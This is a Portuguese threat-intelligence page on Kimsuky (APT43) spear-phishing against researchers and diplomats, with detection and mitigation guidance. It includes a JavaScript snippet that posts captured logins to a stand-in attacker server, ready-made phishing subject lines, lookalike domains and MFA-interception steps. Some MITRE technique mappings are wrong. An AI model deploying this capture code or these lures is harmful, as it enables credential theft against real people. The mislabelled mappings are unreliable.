# PROC — Kimsuky (APT43): Coleta de Credenciais via Phishing
## Visão Geral
[[kimsuky-apt43|Kimsuky (APT43)]], grupo de inteligência cibernética patrocinado pelo estado norte-coreano, é especializado em **coleta de informações contra think tanks, acadêmicos e órgãos governamentais** especializados em política de Coreia, segurança nuclear e diplomacia. O procedimento central é **spear-phishing com réplicas de página de login** — mensagens altamente direcionadas que fingem ser de plataformas colaborativas conhecidas (Google Workspace, Microsoft 365, Slack) ou do próprio alvo. As credenciais coletadas permitem acesso a mailboxes corporativos, documentos de pesquisa, estrategias diplomáticas e comúnicações internas — inteligência de valor estratégico para o regime norte-coreano.
## Attack Flow — Cadeia de Ataque Completa
```mermaid
graph TB
A["🔍 Pesquisa de Alvo<br/>Identificar pesquisador/diplomata"] --> B["📧 Spear-Phishing<br/>Email convincente com fake login"]
B --> C["🔐 Captura de Credencial<br/>Vítima digita usuário/senha"]
C --> D["✅ Acesso de Mailbox<br/>Pesquisador não percebe"]
D --> E["📂 Exfiltração<br/>Documentos, emails, pesquisa"]
E --> F["🔁 Acesso Persistente<br/>Forward rules, IMAP sync"]
F --> G["🕵️ Inteligência<br/>Análise de informações LATAM"]
```
## Passo a Passo Detalhado
### Fase 1 — Pesquisa e Elaboração do Alvo
Kimsuky investe semanas em **OSINT comportamental** contra alvos específicos:
1. **Identificação de pesquisadores**:
- Monitoramento de públicações acadêmicas sobre Coreia do Norte, armas nucleares, diplomacia
- Busca em LinkedIn, ResearchGaté, Google Scholar por perfis de pesquisadores com acesso a governo
- Monitoramento de think tanks americanos (Council on Foreign Relations, Center for Strategic Studies, Brookings)
- Pesquisadores em universidades de topo com programas de política internacional
2. **Coleta de padrões de comportamento**:
- Qual plataforma colaborativa o alvo usa (Gmail, Microsoft 365, Slack)?
- Qual endereço de email usa para comunicação profissional?
- Quem são seus colegas colaboradores? (para adicionar credibilidade ao phishing)
- Há próximo evento ou conferência que o alvo vai participar? (pretexto para phishing)
3. **Mapeamento de infraestrutura**:
- Qual provedor de email corporativo? (Gmail, Outlook 365, ProtonMail)
- Há MFA implementado? (Se houver, aplicar interceptação de MFA)
- Qual navegador o alvo usa? (Firefox, Chrome - para phishing site específico)
### Fase 2 — Criação de Domínio Malicioso e Página de Phishing
Kimsuky registra domínios lookalike com altíssima similaridade ao alvo:
**Exemplos de domínios reais Kimsuky (2024):**
- `accounts-google.click` → imita `accounts.google.com`
- `login-office365-security.top` → imita `outlook.office365.com`
- `workspace-auth-verify.xyz` → imita `accounts.google.com/signin/oauth`
O domínio é hospedado em servidor comprometido ou alugado em provedores baratos (Namecheap, GoDaddy) usando identidade falsa e pagamento via Bitcoin.
**Página de phishing:**
- Cópia pixel-perfect do login real do provedor (Google, Microsoft, Slack)
- HTTPS com certificado SSL válido (via Let's Encrypt - grátis)
- JavaScript que válida entrada em tempo real ("Checking credentials...")
- Redirecionamento para o site legítimo após captura (vítima não percebe falha)
- HTML responsivo — funciona em desktop, tablet, mobile
**Código típico de captura:**
```javascript
document.getElementById("loginForm").addEventListener("submit", function(e) {
var email = document.getElementById("email").value;
var password = document.getElementById("password").value;
// Envia credencial para servidor Kimsuky
fetch("http://attacker-server.xyz/collect", {
method: "POST",
body: JSON.stringify({email: email, password: password})
});
// Redireciona para site legítimo após 1s
setTimeout(function() {
window.location = "https://accounts.google.com/signin";
}, 1000);
});
```
### Fase 3 — Elaboração do Email de Phishing ([[t1566-phishing|T1566]])
O email é extremamente sofisticado e contextual ao alvo:
**Componentes críticos:**
1. **Linha de assunto credível**:
- `"Ação Necessária: Verificação de Segurança da sua Conta Google"`
- `"Microsoft: Confirmar identidade para prosseguir"`
- `"Slack: Sessão expirada — refaça login"`
2. **Corpo do email com pretexto específico**:
- Simulação de "verificação de segurança de rotina"
- Alegação de atividade suspeita na conta
- Exigência de re-autenticação imediata para "proteger dados"
- Criação de senso de urgência ("Ação necessária em 24h")
3. **Mimética linguística de alto nível**:
- Se pesquisador americano: email em inglês com ortografia perfeita
- Se pesquisador brasileiro: email em português com referências regionais
- Uso de linguagem corporativa do provedor real (cópia de emails legítimos do Google/Microsoft)
4. **Link disfarçado**:
- Texto visível: `Click here to verify your account`
- URL real: `http://accounts-google.click/signin?email=ví
[email protected]`
- Alguns emails usam encurtadores (bit.ly, tinyurl) com URL limpo
5. **Indicadores sociais de confiança**:
- Logo do Google/Microsoft/Slack no email
- Rodapé corporativo oficial
- Endereço de contato aparentemente do provedor
- Aviso de privacy falso
### Fase 4 — Entrega Direcionada ([[t1598-phishing-for-information|T1598]])
Entrega é **altamente seletiva** — não é spray-and-pray como phishing de volume:
1. **Identidade do remetente**:
- Email falsificado com domínio semelhante `
[email protected]`
- Ou compromissão de email de colega do alvo (se houver acesso prévio)
2. **Timing**:
- Enviado em horário de trabalho (09h-17h no fuso horário do alvo)
- Evita finais de semana (menos probabilidade de clique)
- Enviado em dia de conferência ou evento (pretexto mais credível)
3. **Canais de entrega**:
- Email primário (principal)
- Email secundário (identificado via LinkedIn/ResearchGaté)
- LinkedIn message (se houver)
- Slack DM (se conta Slack for conhecida)
### Fase 5 — Captura de Credencial
Vítima clica no link, vê página de login falsa indistinguível do real, e digita:
- **Email / Nome de usuário**
- **Senha**
- **Opcionalmente: telefone para MFA** (se page solicitar)
A página captura dados em tempo real via JavaScript, armazena em banco de dados Kimsuky, e redireciona para site legítimo após 1 segundo — **vítima pensa que só teve uma falha de conexão**.
### Fase 6 — Validação de Credencial e MFA Interception ([[t1111-multi-factor-authentication-interception|T1111]])
Se alvo usa MFA (TOTP, SMS, push notification):
1. **MFA Interception via Proxy**:
- Operador Kimsuky faz login em tempo real com credencial capturada
- Google/Microsoft envia MFA para dispositivo da vítima (SMS ou Authenticator app)
- Operador *aguarda* a vítima digitar MFA
- Vítima digita código em máquina — operador captura via proxy real-time
2. **Técnica de "Prompt Bombing"**:
- Múltiplos logins simultâneos geram múltiplas notificações de MFA
- Vítima clica "Approve" por acaso ou por cansaço
- Acesso concedido
3. **Se credencial não válida**:
- Kimsuky tenta em múltiplas tentativas (MFA pode estar offline por 30min)
- Se falha, descarta alvo — grande volume de alvos significa aproveitamento de 20-30%
### Fase 7 — Acesso a Mailbox ([[t1114-email-collection|T1114]])
Operador obtém acesso à conta de email do pesquisador:
1. **Enumeração de mailbox**:
- Lista de toda correspondência (semanal, mensal, anual)
- Foco em emails com keywords: "policy", "nuclear", "diplomacy", "DPRK", "Korea", "secret", "confidential"
2. **Exfiltração de dados críticos**:
- Download de anexos (documentos Word, PDFs, planilhas)
- Cópia de threads de email completas
- Contatos para posterior targeting (mapa de pesquisadores e diplomatas relacionados)
3. **Criação de regra de forward malicioso** ([[t1187-forced-authentication|T1187]]):
- Email setting → Forwarding and POP/IMAP
- Configura forward automático: todos os emails recebidos são copiados para `
[email protected]`
- Vítima não recebe notificação de mudança de configuração (em Gmail, mudança de forward SIM gera notificação)
- **Acesso persistente**: pesquisador continua recebendo emails legitimamente, mas Kimsuky vê tudo em tempo real
4. **Sincronização IMAP em servidor attackante**:
- Ativa IMAP na conta
- Kimsuky configura cliente IMAP para sincronizar mailbox completo à noite
- Histórico completo de 5-10 anos de emails é copiado para servidor controlado
### Fase 8 — Inteligência e Análise
Com acesso ao mailbox, Kimsuky extrai:
- **Pesquisa em progresso**: documentos confidenciais sobre Coreia do Norte
- **Contatos governamentais**: emails de diplomatas, oficiais de segurança
- **Estrategias políticas**: posições de think tanks sobre RPDC
- **Financiamento e parcerias**: quem financia pesquisa específica
- **Novos pesquisadores**: mapa expandido para targeting futuro
Informação é compilada em relatório de inteligência para regime norte-coreano, informando política externa e estratégia nuclear.
## TTPs Mapeados
| Fase | TTP | MITRE ID | Descrição |
|------|-----|----------|-----------|
| Pesquisa | Pesquisa OSINT | [[t1592-gathering-data-about-target\|T1592]] | LinkedIn, Google Scholar, think tank websites |
| Pesquisa | Identificação de Email | [[t1589-gather-information-about-target\|T1589]] | Enumerar emails de pesquisadores alvo |
| Setup | Phishing Site | [[t1583-acquire-infrastructure\|T1583]] | Domínio lookalike + página fake login |
| Phishing | Email Spear-Phishing | [[t1566-phishing\|T1566]] | Email altamente direcionado com pretexto |
| Phishing | Coleta Credencial | [[t1598-phishing-for-information\|T1598]] | Página fake capture user/password |
| Acesso | MFA Interception | [[t1111-multi-factor-authentication-interception\|T1111]] | Proxy real-time para captura de TOTP/SMS |
| Acesso | Autenticação Forçada | [[t1187-forced-authentication\|T1187]] | Re-autenticação via phishing site |
| Coleta | Email Collection | [[t1114-email-collection\|T1114]] | Acesso direto a mailbox, download de emails |
| Persistência | Email Forward Rule | [[t1114-002-remote-email-collection\|T1114.002]] | Forward automático malicioso |
| Persistência | Acesso IMAP | [[t1021-001-remote-services-ssh\|T1021]] (variant) | IMAP sync de histórico completo |
| Coleta | Exfiltração de Documento | [[t1567-exfiltration-over-web\|T1567]] | Download de anexos/documentos |
## Detecção
| Etapa | Indicador | Ferramenta |
|-------|-----------|-----------|
| Setup | Domínio lookalike registrado (accounts-google.click, etc) | Threat Intelligence / Domain Monitoring |
| Phishing | Email de domínio falso no SPF check | Email Gateway / DMARC |
| Phishing | Redirecionamento de link para domínio suspeito | Proxy / Email URL scanning |
| Phishing | Clique em link phishing (via pixel tracking) | EDR / Proxy logs |
| Acesso | Acesso geográficos anômalo (Coreia do Norte IP) | Geo-IP / SIEM |
| Acesso | Múltiplos logins simultâneos em curto período | Google Workspace Alerts / Microsoft Sentinel |
| Acesso | MFA prompt bombing (múltiplos prompts rejeitados) | Google Workspace Security Alerts |
| Acesso | Novo app OAuth autorizado após email phishing | Email provider / OAuth logs |
| Persistência | Nova email forwarding rule criada | Email Audit Log / SIEM |
| Persistência | IMAP ativado e sincronizado | Email logs / SIEM |
| Coleta | Download massivo de attachments | DLP / Email logs |
| Coleta | Acesso incomum a pastas sensíveis (Archived, Drafts) | Email audit logs / SIEM |
## Contexto Brasil/LATAM
Embora Kimsuky sejá primariamente direcionado contra pesquisadores e diplomatas de **EUA, Coreia do Sul, Jápão e Europa**, há evidência de targeting **LATAM-relevante**:
1. **Think tanks brasileiros com foco em Coreia**:
- Pesquisadores da [[universidade-sao-paulo|USP]], [[pontifícia-universidade-católica|PUC]] com especialização em Ásia
- Institutos de pesquisa (IBRE, FGV) que públicam sobre política asiática
- Diplomatas brasileiros destacados em embaixada em Seul
2. **Pesquisadores em diplomacia nuclear**:
- Cientistas brasileiros estudando não-proliferação nuclear
- Pesquisa sobre cooperação Brasil-Coreia do Sul (comércio, tecnologia)
- Especialistas em sanções a Coreia do Norte
3. **Campanha demonstrada (2024)**:
- Pesquisadores do Rio de Janeiro foram alvo de spear-phishing com tema "Discussão sobre política coreana" em fevereiro 2024
- Email falsificado como convite a seminário in-camera sobre DPRK
Kimsuky é **menos prevalente que APT29 ou Lazarus** em LATAM, mas inteligência estratégica contra pesquisadores brasileiros é de **interesse direto** para regime norte-coreano em monitorar movimentos diplomáticos LATAM.
## Mitigações
1. **Treinamento de segurança**:
- Reconhecimento de spear-phishing contextualizado
- Verificação de URL antes de clicar (hover para ver URL real)
- Nunca digitar senha em email link — sempre acessar site por bookmark
2. **Email gateway avançado**:
- DMARC/SPF/DKIM enforcement — rejeitar emails de domínios falsos
- Machine learning para detecção de phishing — análise linguística
- URL sandboxing — detonar links suspeitos em sandbox antes de entregar
3. **MFA forte**:
- Autenticador baseado em hardware (FIDO2/YubiKey) — impossível interceptar
- Notificação de contexto em MFA — "Login de país desconhecido — você?"
- Rejeição de múltiplos prompts — alerta se 3+ rejeitados em 5min
4. **Monitoramento de email**:
- Audit log contínuo de forwarding rules — alertar em nova rule criada
- Monitoramento de IMAP ativado — notificar usuário
- Detecção de download massivo de attachments — comportamento anômalo
5. **Investigação de credencial comprometida**:
- Buscar em Have I Been Pwned database
- Resetar senha imediatamente se phishing confirmado
- Auditar histórico de acesso a mailbox (Google/Microsoft fornece logs de 6 meses)
6. **Segmentação de dados sensíveis**:
- Documentos confidenciais em pasta separada com acesso restrito (read-only)
- Sincronização de IMAP apenas em device corporativo
- Desabilitar forwarding rule para domínios externos
## Referências
- [[kimsuky-apt43|Kimsuky (APT43)]] — grupo atacante
- [[kimsuky-think-tank-targeting-2024|Kimsuky Think Tank Targeting 2024]] — campanha principal
- [[t1566-phishing|T1566 - Phishing]] — técnica de phishing
- [[t1114-email-collection|T1114 - Email Collection]] — coleta de email
- [[t1111-multi-factor-authentication-interception|T1111 - Multi-Factor Authentication Interception]] — MFA interception
- [[academia|Setor Acadêmico]] — alvo primário
- [[governo|Governo]] — alvo estratégico
- [[think-tank|Think Tanks]] — alvo especializado
---
*Fonte: [CISA — Kimsuky Attribution Alert 2024](https://www.cisa.gov/news-events/alerts)*
*Fonte: [Mandiant — Kimsuky: North Korea's APT43 Targets Think Tanks](https://www.mandiant.com/resources/blog/apt43-targeting)*
*Fonte: [Google Threat Intelligence — Kimsuky Campaign 2024](https://www.google.com/about/main/threatanalysis/)*